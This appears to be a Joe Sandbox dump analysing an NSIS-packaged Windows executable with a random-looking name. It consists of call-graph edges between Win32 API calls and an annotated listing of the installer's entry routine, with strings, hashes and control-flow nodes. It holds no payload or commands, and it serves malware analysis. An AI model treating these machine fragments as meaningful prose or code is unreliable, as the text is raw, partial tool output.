408625 7283 408630 7281->7283 7284 408648 7281->7284 7287 4087d5 7282->7287 7314 407ce8 lstrcatA 7283->7314 7286 4078ce 2 API calls 7284->7286 7288 408644 7286->7288 7289 407cf2 3 API calls 7287->7289 7287->7305 7292 408671 lstrlenA FindFirstFileA 7288->7292 7315 407ce8 lstrcatA 7288->7315 7290 4087e2 7289->7290 7291 407a46 2 API calls 7290->7291 7294 4087eb RemoveDirectoryA 7291->7294 7292->7280 7311 4086a7 7292->7311 7296 4087fa 7294->7296 7297 40882c 7294->7297 7300 406fcb 23 API calls 7296->7300 7296->7305 7299 406fcb 23 API calls 7297->7299 7298 4078a4 CharNextA 7298->7311 7299->7305 7301 408810 7300->7301 7302 408311 39 API calls 7301->7302 7302->7305 7303 40878f FindNextFileA 7306 4087ac FindClose 7303->7306 7303->7311 7305->6889 7305->6893 7306->7280 7308 4085b8 56 API calls 7308->7311 7310 406fcb 23 API calls 7310->7311 7311->7298 7311->7303 7311->7308 7311->7310 7316 407cb6 lstrcpynA 7311->7316 7317 407a46 GetFileAttributesA 7311->7317 7320 408311 7311->7320 7313->7281 7316->7311 7318 407a71 DeleteFileA 7317->7318 7319 407a5f SetFileAttributesA 7317->7319 7318->7311 7319->7318 7321 408299 5 API calls 7320->7321 7322 40832c 7321->7322 7323 408345 7322->7323 7327 4085a8 7322->7327 7346 407a78 GetFileAttributesA CreateFileA 7322->7346 7324 4083b5 GetShortPathNameA 7323->7324 7323->7327 7326 4083d5 7324->7326 7324->7327 7326->7327 7329 4083e0 wsprintfA 7326->7329 7327->7311 7328 40837d CloseHandle GetShortPathNameA 7328->7323 7328->7327 7330 407e06 18 API calls 7329->7330 7331 408423 7330->7331 7347 407a78 GetFileAttributesA CreateFileA 7331->7347 7333 408441 7333->7327 7334 40844f GetFileSize GlobalAlloc 7333->7334 7335 408488 ReadFile 7334->7335 7336 40859e CloseHandle 7334->7336 7335->7336 7337 4084b3 7335->7337 7336->7327 7337->7336 7348 4079b4 lstrlenA 7337->7348 7340 4084d2 7353 407cb6 lstrcpynA 7340->7353 7341 4084ee 7342 4079b4 3 API calls 7341->7342 7344 4084e8 7342->7344 7345 408547 SetFilePointer WriteFile GlobalFree 7344->7345 7345->7336 7346->7328 7347->7333 7349 4079d4 7348->7349 7350 407a05 7349->7350 7351 4079df lstrcmpiA 7349->7351 7350->7340 7350->7341 7351->7350 7352 407a09 CharNextA 7351->7352 7352->7349 7353->7344 8033 403376 8034 401456 18 API calls 8033->8034 8035 403394 8034->8035 8036 40339f SetFilePointer 8035->8036 8037 4033c9 8036->8037 8038 403700 8037->8038 8039 4036eb 8037->8039 8042 4036f7 8037->8042 8041 407e06 18 API calls 8038->8041 8040 401456 18 API calls 8039->8040 8040->8042 8041->8042 8043 401777 SetForegroundWindow 8044 40219b 8043->8044 8318 4033f9 FindNextFileA 8319 403429 8318->8319 8320 40347d 8319->8320 8324 407be3 wsprintfA 8319->8324 8325 407cb6 lstrcpynA 8320->8325 8323 4036c5 8324->8320 8325->8323 7624 40247c GetDC GetDeviceCaps 7625 401456 18 API calls 7624->7625 7626 4024ad MulDiv 7625->7626 7627 401456 18 API calls 7626->7627 7628 4024d9 7627->7628 7629 407e06 18 API calls 7628->7629 7630 402520 CreateFontIndirectA 7629->7630 7631 40252f 7630->7631 7634 407be3 wsprintfA 7631->7634 7633 40253c 7634->7633 8045 40297c 8046 402a36 8045->8046 8047 40163b 23 API calls 8046->8047 8048 402a3b 8047->8048 8326 4017fe 8327 402530 8326->8327 8330 407be3 wsprintfA 8327->8330 8329 40253c 8330->8329 7635 401000 7636 401032 BeginPaint GetClientRect 7635->7636 7637 401017 DefWindowProcA 7635->7637 7639 401078 7636->7639 7642 401212 7637->7642 7640 401130 7639->7640 7641 401084 CreateBrushIndirect FillRect DeleteObject 7639->7641 7643 40113a CreateFontIndirectA 7640->7643 7644 4011db EndPaint 7640->7644 7641->7639 7643->7644 7645 401151 6 API calls 7643->7645 7644->7642 7645->7644 7860 403684 7861 401456 18 API calls 7860->7861 7862 403689 7861->7862 7863 4036ca 7862->7863 7864 4036b0 7862->7864 7870 402a3c 7862->7870 7865 403700 7863->7865 7866 4036eb 7863->7866 7871 407cb6 lstrcpynA 7864->7871 7868 407e06 18 API calls 7865->7868 7867 401456 18 API calls 7866->7867 7867->7870 7868->7870 7871->7870 7652 401809 7653 40181c 7652->7653 7654 40180d ShowWindow 7652->7654 7655 40256d ShowWindow 7653->7655 7656 4037d4 7653->7656 7654->7653 7655->7656 7879 403089 7888 4015b0 7879->7888 7881 403095 7882 401456 18 API calls 7881->7882 7883 4030a4 7882->7883 7884 4030e5 RegEnumValueA 7883->7884 7885 4030c7 RegEnumKeyA 7883->7885 7886 402a3c 7883->7886 7884->7886 7887 40312b RegCloseKey 7884->7887 7885->7887 7887->7886 7889 401400 18 API calls 7888->7889 7891 4015cc RegOpenKeyExA 7889->7891 7891->7881 8331 40258a 8332 401400 18 API calls 8331->8332 8333 40258f 8332->8333 8334 401400 18 API calls 8333->8334 8335 40259e 8334->8335 8336 401400 18 API calls 8335->8336 8337 4025ad 8336->8337 8338 401400 18 API calls 8337->8338 8339 4025bc 8338->8339 8340 40163b 23 API calls 8339->8340 8341 4025c9 ShellExecuteA 8340->8341 8056 40710b 8057 4073a5 8056->8057 8073 40712c 8056->8073 8058 407404 8057->8058 8059 4073ad GetDlgItem CreateThread CloseHandle 8057->8059 8061 40740c 8058->8061 8062 40744f 8058->8062 8060 4074ba 8059->8060 8064 407449 8060->8064 8068 4074cd SendMessageA 8060->8068 8063 407418 ShowWindow ShowWindow 8061->8063 8061->8064 8062->8060 8067 407473 ShowWindow 8062->8067 8077 407460 8062->8077 8104 404c96 SendMessageA 8063->8104 8065 404f0f 8 API calls 8064->8065 8069 407687 8065->8069 8070 407494 8067->8070 8067->8077 8068->8069 8072 4074fc CreatePopupMenu 8068->8072 8074 406fcb 23 API calls 8070->8074 8075 407e06 18 API calls 8072->8075 8102 404c96 SendMessageA 8073->8102 8074->8077 8078 407518 AppendMenuA 8075->8078 8105 404cc8 8077->8105 8080 407540 GetWindowRect 8078->8080 8081 40755a 8078->8081 8079 4071b9 8082 4071c6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 8079->8082 8083 407564 TrackPopupMenu 8080->8083 8081->8083 8084 407247 SendMessageA SendMessageA 8082->8084 8085 40727f 8082->8085 8083->8069 8086 40759e 8083->8086 8084->8085 8087 407285 SendMessageA 8085->8087 8088 4072a8 8085->8088 8090 4075c4 SendMessageA 8086->8090 8091 4075ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8086->8091 8087->8088 8089 404d65 18 API calls 8088->8089 8093 4072c5 8089->8093 8090->8086 8092 40762a SendMessageA 8091->8092 8092->8092 8094 407664 GlobalUnlock SetClipboardData CloseClipboard 8092->8094 8095 4072d1 ShowWindow 8093->8095 8096 40731c SendMessageA 8093->8096 8094->8069 8097 4072f4 ShowWindow 8095->8097 8098 407305 8095->8098 8096->8069 8100 407365 SendMessageA SendMessageA 8096->8100 8097->8098 8103 404c96 SendMessageA 8098->8103 8100->8069 8102->8079 8103->8096 8104->8064 8106 404cd6 8105->8106 8107 404cdc SendMessageA 8105->8107 8106->8107 8107->8060 7389 401b0d 7390 401400 18 API calls 7389->7390 7391 401b12 7390->7391 7392 401b2b 7391->7392 7393 401b3d 7391->7393 7443 407cb6 lstrcpynA 7392->7443 7444 407cb6 lstrcpynA 7393->7444 7396 401b3b 7400 407d37 5 API calls 7396->7400 7397 401b51 7398 407cf2 3 API calls 7397->7398 7399 401b5b 7398->7399 7445 407ce8 lstrcatA 7399->7445 7402 401b76 7400->7402 7403 401b7c 7402->7403 7424 401bba 7402->7424 7404 408123 2 API calls 7403->7404 7405 401b88 7404->7405 7407 401b91 CompareFileTime 7405->7407 7408 401ba9 7405->7408 7406 407a46 2 API calls 7406->7424 7407->7408 7408->7424 7410 401cce 7412 406fcb 23 API calls 7410->7412 7411 401c05 7414 406fcb 23 API calls 7411->7414 7415 401cde 7412->7415 7413 407cb6 lstrcpynA 7413->7424 7422 401c15 7414->7422 7416 403d52 45 API calls 7415->7416 7417 401d08 7416->7417 7418 401d25 SetFileTime 7417->7418 7419 401d1c 7417->7419 7420 401d47 CloseHandle 7418->7420 7419->7418 7419->7420 7420->7422 7423 401d59 7420->7423 7421 407e06 18 API calls 7421->7424 7425 401d86 7423->7425 7426 401d5e 7423->7426 7424->7406 7424->7410 7424->7411 7424->7413 7424->7421 7430 407836 MessageBoxIndirectA 7424->7430 7433 401ca5 7424->7433 7442 407a78 GetFileAttributesA CreateFileA 7424->7442 7428 407e06 18 API calls 7425->7428 7427 407e06 18 API calls 7426->7427 7429 401d72 7427->7429 7431 401d84 7428->7431 7446 407ce8 lstrcatA 7429->7446 7430->7424 7434 407836 MessageBoxIndirectA 7431->7434 7433->7422 7435 406fcb 23 API calls 7433->7435 7437 401cc9 7434->7437 7435->7437 7447 407cb6 lstrcpynA 7437->7447 7438 402141 7448 407cb6 lstrcpynA 7438->7448 7440 402157 7449 407cb6 lstrcpynA 7440->7449 7442->7424 7443->7396 7444->7397 7447->7438 7448->7440 7449->7422 7657 40200f 7658 401456 18 API calls 7657->7658 7659 402016 7658->7659 7660 401456 18 API calls 7659->7660 7661 402025 7660->7661 7664 407be3 wsprintfA 7661->7664 7663 402332 7664->7663 8108 401f0f 8109 401400 18 API calls 8108->8109 8110 401f14 8109->8110 8111 401400 18 API calls 8110->8111 8112 401f23 8111->8112 8113 401f34 lstrcmpiA 8112->8113 8114 401f3c lstrcmpA 8112->8114 8115 401f42 8113->8115 8114->8115 8342 40298f 8343 401400 18 API calls 8342->8343 8344 402994 8343->8344 8345 401400 18 API calls 8344->8345 8346 4029a7 8345->8346 8347 401400 18 API calls 8346->8347 8348 4029b6 8347->8348 8349 401400 18 API calls 8348->8349 8350 4029c9 8349->8350 8351 401400 18 API calls 8350->8351 8353 4029d8 8351->8353 8352 4029f9 CoCreateInstance 8355 402a2f 8352->8355 8361 402a46 8352->8361 8353->8352 8354 401400 18 API calls 8353->8354 8356 4029f8 8354->8356 8357 40163b 23 API calls 8355->8357 8356->8352 8358 402a3b 8357->8358 8359 402bc5 8360 40163b 23 API calls 8359->8360 8360->8358 8362 402b39 MultiByteToWideChar 8361->8362 8363 402b7c 8361->8363 8362->8363 8363->8355 8363->8359 7892 403491 7893 401400 18 API calls 7892->7893 7895 40349d 7893->7895 7894 4034b9 7897 407a46 2 API calls 7894->7897 7895->7894 7896 401400 18 API calls 7895->7896 7896->7894 7898 4034c2 7897->7898 7919 407a78 GetFileAttributesA CreateFileA 7898->7919 7900 4034db 7901 403500 GlobalAlloc 7900->7901 7902 4034e7 DeleteFileA 7900->7902 7904 403644 CloseHandle 7901->7904 7905 40352f 7901->7905 7903 403668 7902->7903 7908 40163b 23 API calls 7903->7908 7909 403677 7903->7909 7904->7902 7904->7903 7920 403b31 SetFilePointer 7905->7920 7907 40353b 7910 403ae9 ReadFile 7907->7910 7908->7909 7911 40354e GlobalAlloc 7910->7911 7912 40356b 7911->7912 7913 4035dd WriteFile GlobalFree 7911->7913 7914 403d52 45 API calls 7912->7914 7915 403d52 45 API calls 7913->7915 7918 40358f 7914->7918 7916 40363f 7915->7916 7916->7904 7917 4035d3 GlobalFree 7917->7913 7918->7917 7919->7900 7920->7907 7665 406614 GetDlgItem GetDlgItem 7666 406671 7 API calls 7665->7666 7671 4069d1 7665->7671 7667 406797 DeleteObject 7666->7667 7668 406777 SendMessageA 7666->7668 7669 4067b0 7667->7669 7668->7667 7672 407e06 18 API calls 7669->7672 7675 40681b 7669->7675 7670 406af3 7673 406b30 7670->7673 7674 406bf6 7670->7674 7671->7670 7701 406a56 7671->7701 7718 406557 SendMessageA 7671->7718 7678 4067d9 SendMessageA SendMessageA 7672->7678 7685 406b49 SendMessageA 7673->7685 7708 4069cb 7673->7708 7676 406c28 7674->7676 7677 406bff SendMessageA 7674->7677 7679 404d65 18 API calls 7675->7679 7682 406c31 7676->7682 7683 406c7a 7676->7683 7677->7708 7678->7669 7686 40683e 7679->7686 7680 404f0f 8 API calls 7689 406eca 7680->7689 7681 406ad0 SendMessageA 7681->7670 7690 406c44 7682->7690 7691 406c3a ImageList_Destroy 7682->7691 7697 403903 2 API calls 7683->7697 7711 406caf 7683->7711 7716 406e5e 7683->7716 7687 406b7b SendMessageA 7685->7687 7685->7708 7688 404d65 18 API calls 7686->7688 7696 406ba1 7687->7696 7695 40685d 7688->7695 7692 406c4d GlobalFree 7690->7692 7690->7708 7691->7690 7692->7708 7693 406e73 ShowWindow GetDlgItem ShowWindow 7693->7708 7694 40696b 7699 406971 GetWindowLongA SetWindowLongA 7694->7699 7700 40699f 7694->7700 7695->7694 7702 4068b2 SendMessageA 7695->7702 7705 406902 SendMessageA 7695->7705 7706 406926 SendMessageA 7695->7706 7698 406bbf SendMessageA 7696->7698 7697->7711 7698->7683 7699->7700 7703 4069c3 7700->7703 7704 4069a5 ShowWindow 7700->7704 7701->7670 7701->7681 7701->7683 7702->7695 7717 404c96 SendMessageA 7703->7717 7704->7703 7705->7695 7706->7695 7708->7680 7709 406e0a InvalidateRect 7710 406e31 7709->7710 7709->7716 7715 404da2 21 API calls 7710->7715 7712 406d17 7711->7712 7713 406ced SendMessageA 7711->7713 7712->7709 7714 406da4 SendMessageA SendMessageA 7712->7714 7713->7712 7714->7712 7715->7716 7716->7693 7716->7708 7717->7708 7719 4065db 7718->7719 7720 406595 GetMessagePos ScreenToClient SendMessageA 7718->7720 7719->7701 7720->7719 8116 401714 8117 40171c 8116->8117 8118 403845 2 API calls 8117->8118 8119 40172e 8118->8119 7721 40261a 7722 401400 18 API calls 7721->7722 7723 40261f 7722->7723 7724 406fcb 23 API calls 7723->7724 7725 402632 7724->7725 7736 407779 CreateProcessA 7725->7736 7727 402656 WaitForSingleObject 7729 40267b GetExitCodeProcess 7727->7729 7730 40263c 7727->7730 7733 4026b1 CloseHandle 7729->7733 7734 402699 7729->7734 7730->7727 7731 402a3c 7730->7731 7732 408848 2 API calls 7730->7732 7730->7733 7732->7730 7733->7731 7739 407be3 wsprintfA 7734->7739 7737 4077f5 7736->7737 7738 4077e5 CloseHandle 7736->7738 7737->7730 7738->7737 7739->7733 8371 4023a0 8372 401456 18 API calls 8371->8372 8373 4023ae SetWindowLongA 8372->8373 8374 40382c 8373->8374 8375 402fa4 8376 4015b0 19 API calls 8375->8376 8377 402fa9 8376->8377 8378 401400 18 API calls 8377->8378 8379 402fbc 8378->8379 8380 402fd1 RegQueryValueExA 8379->8380 8383 402a3c 8379->8383 8381 403015 8380->8381 8382 403025 RegCloseKey 8380->8382 8381->8382 8386 407be3 wsprintfA 8381->8386 8382->8383 8386->8382 7921 401aa5 7922 401400 18 API calls 7921->7922 7923 401aaa SearchPathA 7922->7923 7925 402dab 7923->7925 7924 4036c5 7925->7924 7929 407be3 wsprintfA 7925->7929 7927 40347d 7930 407cb6 lstrcpynA 7927->7930 7929->7927 7930->7924 8387 4031a6 8388 401456 18 API calls 8387->8388 8390 4031b3 8388->8390 8389 403831 8390->8389 8391 4031f8 WriteFile 8390->8391 8392 4097a6 8393 408cf0 8392->8393 8394 408a96 8392->8394 8394->8393 8395 408b69 GlobalAlloc 8394->8395 8396 408b4d GlobalFree 8394->8396 8397 408c55 GlobalAlloc 8394->8397 8398 408c45 GlobalFree 8394->8398 8395->8393 8395->8394 8396->8395 8397->8393 8397->8394 8398->8397 8399 405bab 8400 405bc1 8399->8400 8401 405be9 8399->8401 8409 407805 GetDlgItemTextA 8400->8409 8403 405c39 8401->8403 8404 405bee SHGetPathFromIDListA 8401->8404 8405 405c04 8404->8405 8406 405bd1 SendMessageA 8404->8406 8408 403903 2 API calls 8405->8408 8406->8403 8408->8406 8409->8406 8127 40272e 8128 401400 18 API calls 8127->8128 8129 402733 8128->8129 8130 408299 5 API calls 8129->8130 8131 402746 8130->8131 8132 40277c GlobalAlloc 8131->8132 8135 402a3c 8131->8135 8133 402799 8132->8133 8132->8135 8134 408299 5 API calls 8133->8134 8136 4027a5 8134->8136 8137 408299 5 API calls 8136->8137 8140 4027b8 8137->8140 8138 4027e5 GlobalFree 8138->8135 8140->8138 8144 407be3 wsprintfA 8140->8144 8142 40282d 8145 407be3 wsprintfA 8142->8145 8144->8142 8145->8138 7740 401e30 7741 401400 18 API calls 7740->7741 7742 401e35 7741->7742 7747 407cde lstrlenA 7742->7747 7748 403432 7749 401400 18 API calls 7748->7749 7750 403437 FindFirstFileA 7749->7750 7751 403452 7750->7751 7756 407be3 wsprintfA 7751->7756 7753 40347d 7757 407cb6 lstrcpynA 7753->7757 7755 4036c5 7756->7753 7757->7755 7758 403235 7759 401456 18 API calls 7758->7759 7763 40323c 7759->7763 7760 40326b ReadFile 7760->7763 7766 4032d8 7760->7766 7761 4032bf 7767 407be3 wsprintfA 7761->7767 7763->7760 7763->7761 7764 4032ef 7763->7764 7763->7766 7765 4032fb SetFilePointer 7764->7765 7764->7766 7765->7766 7767->7766 7931 4020b5 7932 401400 18 API calls 7931->7932 7933 4020ba 7932->7933 7934 401456 18 API calls 7933->7934 7935 4020c9 wsprintfA 7934->7935 7936 40382f 7935->7936 8410 4057b5 8411 4057d0 8410->8411 8412 40597b 8410->8412 8415 404d65 18 API calls 8411->8415 8413 405987 8412->8413 8414 405a0b 8412->8414 8420 4059b0 GetDlgItem SendMessageA 8413->8420 8436 405a06 8413->8436 8416 405a14 GetDlgItem 8414->8416 8414->8436 8417 40583a 8415->8417 8418 405b02 8416->8418 8422 405a37 8416->8422 8421 404d65 18 API calls 8417->8421 8424 405b14 8418->8424 8418->8436 8419 404f0f 8 API calls 8423 405b9a 8419->8423 8447 404d44 EnableWindow 8420->8447 8426 405857 CheckDlgButton 8421->8426 8422->8418 8427 405a65 SendMessageA 8422->8427 8428 405b43 8424->8428 8429 405b1a SendMessageA 8424->8429 8444 404d44 EnableWindow 8426->8444 8435 405aa2 SetCursor ShellExecuteA 8427->8435 8428->8423 8432 405b4e SendMessageA 8428->8432 8429->8428 8430 405a00 8448 404d05 SendMessageA 8430->8448 8432->8423 8434 405880 GetDlgItem 8445 404c96 SendMessageA 8434->8445 8439 405afa SetCursor 8435->8439 8436->8419 8438 4058a1 SendMessageA 8440 4058e0 SendMessageA SendMessageA 8438->8440 8441 4058d4 GetSysColor 8438->8441 8439->8418 8446 407cde lstrlenA 8440->8446 8441->8440 8444->8434 8445->8438 8447->8430 8448->8436 8449 402db6 8450 402e00 8449->8450 8451 402dbf 8449->8451 8453 401400 18 API calls 8450->8453 8452 4015b0 19 API calls 8451->8452 8454 402dcb 8452->8454 8455 402e0c 8453->8455 8456 401400 18 API calls 8454->8456 8459 402a3c 8454->8459 8460 401482 RegOpenKeyExA 8455->8460 8458 402de2 RegDeleteValueA RegCloseKey 8456->8458 8458->8459 8462 4014ca 8460->8462 8467 401561 8460->8467 8461 401540 RegCloseKey 8464 408299 5 API calls 8461->8464 8462->8461 8463 401511 RegCloseKey 8462->8463 8465 401482 5 API calls 8462->8465 8463->8467 8466 40155c 8464->8466 8465->8462 8466->8467 8468 40158f RegDeleteKeyA 8466->8468 8467->8459 8468->8467 8146 401737 8147 406fcb 23 API calls 8146->8147 8148 401747 8147->8148 8469 401db7 8470 401e0c 8469->8470 8471 401400 18 API calls 8470->8471 8472 401e11 8471->8472 8473 4085b8 63 API calls 8472->8473 8474 401e24 8473->8474 8149 402d3b 8150 401400 18 API calls 8149->8150 8151 402d4a 8150->8151 8152 401400 18 API calls 8151->8152 8153 402d59 8152->8153 8154 401400 18 API calls 8153->8154 8155 402d6c GetPrivateProfileStringA 8154->8155 8156 402dab 8155->8156 8160 4036c5 8156->8160 8161 407be3 wsprintfA 8156->8161 8158 40347d 8162 407cb6 lstrcpynA 8158->8162 8161->8158 8162->8160 8163 40573f 8164 405792 8163->8164 8165 405759 8163->8165 8166 404f0f 8 API calls 8164->8166 8167 404d65 18 API calls 8165->8167 8168 4057a8 8166->8168 8169 405770 8167->8169 8171 4077fb SetDlgItemTextA 8169->8171 8475 401fbf 8476 401456 18 API calls 8475->8476 8477 401fc4 8476->8477 8478 401456 18 API calls 8477->8478 8479 401fd3 8478->8479

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 00404375 Relevance: 56.4, APIs: 21, Strings: 11, Instructions: 398comfilestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 0 404375-404399 SetErrorMode GetVersion 1 4043b6 0->1 2 40439b-4043aa call 408299 0->2 4 4043bb-4043be 1->4 2->1 8 4043ac-4043b5 2->8 6 4043c0-4043c3 call 40820e 4->6 7 4043d9-404492 call 408299 * 2 InitCommonControls OleInitialize SHGetFileInfoA call 407cb6 GetCommandLineA call 407cb6 GetModuleHandleA 4->7 11 4043c8-4043d7 lstrlenA 6->11 20 404494-404499 7->20 21 40449e-4044b8 call 4078a4 CharNextA 7->21 8->1 11->4 20->21 24 4044be-4044c1 21->24 25 404560-40457e GetTempPathA call 4042bc 24->25 26 4044c7-4044cc 24->26 33 404580-40459f DeleteFileA call 403f03 25->33 34 4045a7-4045db GetWindowsDirectoryA call 407ce8 call 4042bc 25->34 27 4044d1-4044d9 26->27 28 4044ce-4044cf 26->28 30 4044e1-4044e4 27->30 31 4044db-4044dc 27->31 28->26 35 404543-40455b call 4078a4 30->35 36 4044e6-4044ed 30->36 31->30 47 4045a5-4045ee 33->47 48 404817-404824 call 404316 OleUninitialize 33->48 34->33 58 4045dd-4045e2 34->58 35->24 37 404500-404507 36->37 38 4044ef-4044fd 36->38 43 404509-404517 37->43 44 40451a-404521 37->44 38->37 43->44 49 404541 44->49 50 404523-40453f call 407cb6 44->50 59 404802-40480c call 4060fd 47->59 60 4045f4-404609 call 4078a4 47->60 62 404844-40484b 48->62 63 404826-40483f call 407836 48->63 49->35 50->25 64 404815 58->64 66 404811-404813 59->66 74 40460a-40460f 60->74 68 404851-40488e call 408299 * 3 62->68 69 40499e-4049a9 62->69 71 4049ac ExitProcess 63->71 64->48 66->48 92 404933-404942 call 408299 68->92 93 404894-40489b 68->93 69->71 76 404611-404617 74->76 77 404662-404681 call 4082eb call 407ce8 74->77 80 404619-40461a 76->80 81 40461c-40462d call 40815b 76->81 95 404683-404698 call 407ce8 77->95 96 404699-4046c8 call 407ce8 lstrcmpiA 77->96 80->74 89 404639-40465d call 407cb6 * 2 81->89 90 40462f-404634 81->90 89->59 90->64 109 404961-40498f 92->109 110 404944-40495d ExitWindowsEx 92->110 93->92 98 4048a1-4048c3 GetCurrentProcess 93->98 95->96 96->90 106 4046ce-4046d7 96->106 98->92 113 4048c5-404930 98->113 111 4046e0 call 40774b 106->111 112 4046d9-4046de call 4076b0 106->112 109->110 114 404991-40499d call 403903 109->114 110->114 115 40495f 110->115 123 4046e5-4046fb SetCurrentDirectoryA 111->123 112->123 113->92 114->69 115->69 124 404713-404735 call 407cb6 123->124 125 4046fd-404712 call 407cb6 123->125 131 40473e-404767 call 407e06 DeleteFileA 124->131 125->124 134 404769-40478b CopyFileA 131->134 135 4047dd-4047e4 131->135 134->135 136 40478d-4047cf call 408311 call 407e06 call 407779 134->136 135->131 137 4047ea-404800 call 408311 135->137 136->135 146 4047d1-4047dc CloseHandle 136->146 137->64 146->135
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 00404388
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 0040438F
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32 ref: 004043CC
                                                                                                                                                                                                                                                              • InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
                                                                                                                                                                                                                                                              • OleInitialize.OLE32 ref: 00404405
                                                                                                                                                                                                                                                              • SHGetFileInfoA.SHELL32 ref: 0040443A
                                                                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
                                                                                                                                                                                                                                                              • CharNextA.USER32 ref: 004044B1
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • GetTempPathA.KERNELBASE(00000001,00000001), ref: 0040456F
                                                                                                                                                                                                                                                              • DeleteFileA.KERNELBASE ref: 0040458D
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 004045B6
                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 0040481C
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004049AC
                                                                                                                                                                                                                                                                • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32 ref: 00404953
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                                                                                                                                                                • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID: /D=$ _?=$"C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe" $%$($@Vl$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Software Setup$UXTHEME
                                                                                                                                                                                                                                                              • API String ID: 3796326152-2889975713
                                                                                                                                                                                                                                                              • Opcode ID: d7153d4af7879aacc660eb0a76c3a013205ac95021754220d5a6f64903ba5e58
                                                                                                                                                                                                                                                              • Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7153d4af7879aacc660eb0a76c3a013205ac95021754220d5a6f64903ba5e58
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004060FD Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 253registrystringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 147 4060fd-40611a call 408299 150 406136-406176 call 407b3a 147->150 151 40611c-406131 call 407be3 147->151 155 4061a7-4061b6 call 407ce8 150->155 156 406178-4061a4 call 407b3a 150->156 161 4061bb-4061e8 call 404ae0 call 40815b 151->161 155->161 156->155 167 4062be-4062cd call 40815b 161->167 168 4061ee-4061f3 161->168 174 4062e7-406329 LoadImageA 167->174 175 4062cf-4062e6 call 407e06 167->175 168->167 170 4061f9-406232 call 407b3a 168->170 170->167 176 406238-40623f 170->176 178 406405-40640c call 403903 174->178 179 40632f-40636b RegisterClassA 174->179 175->174 180 406241-40625c call 4078a4 176->180 181 40625f-40626e call 407cde 176->181 186 406411-406416 178->186 183 406374-406400 SystemParametersInfoA CreateWindowExA 179->183 184 40636d-40636f 179->184 180->181 195 406270-406285 lstrcmpiA 181->195 196 4062a3-4062bd call 407cf2 call 407cb6 181->196 183->178 189 40654e-406556 184->189 190 40653a-40653f 186->190 191 40641c-406428 call 404ae0 186->191 190->189 201 406513-406522 call 404c0d 191->201 202 40642e-406455 ShowWindow call 40820e 191->202 195->196 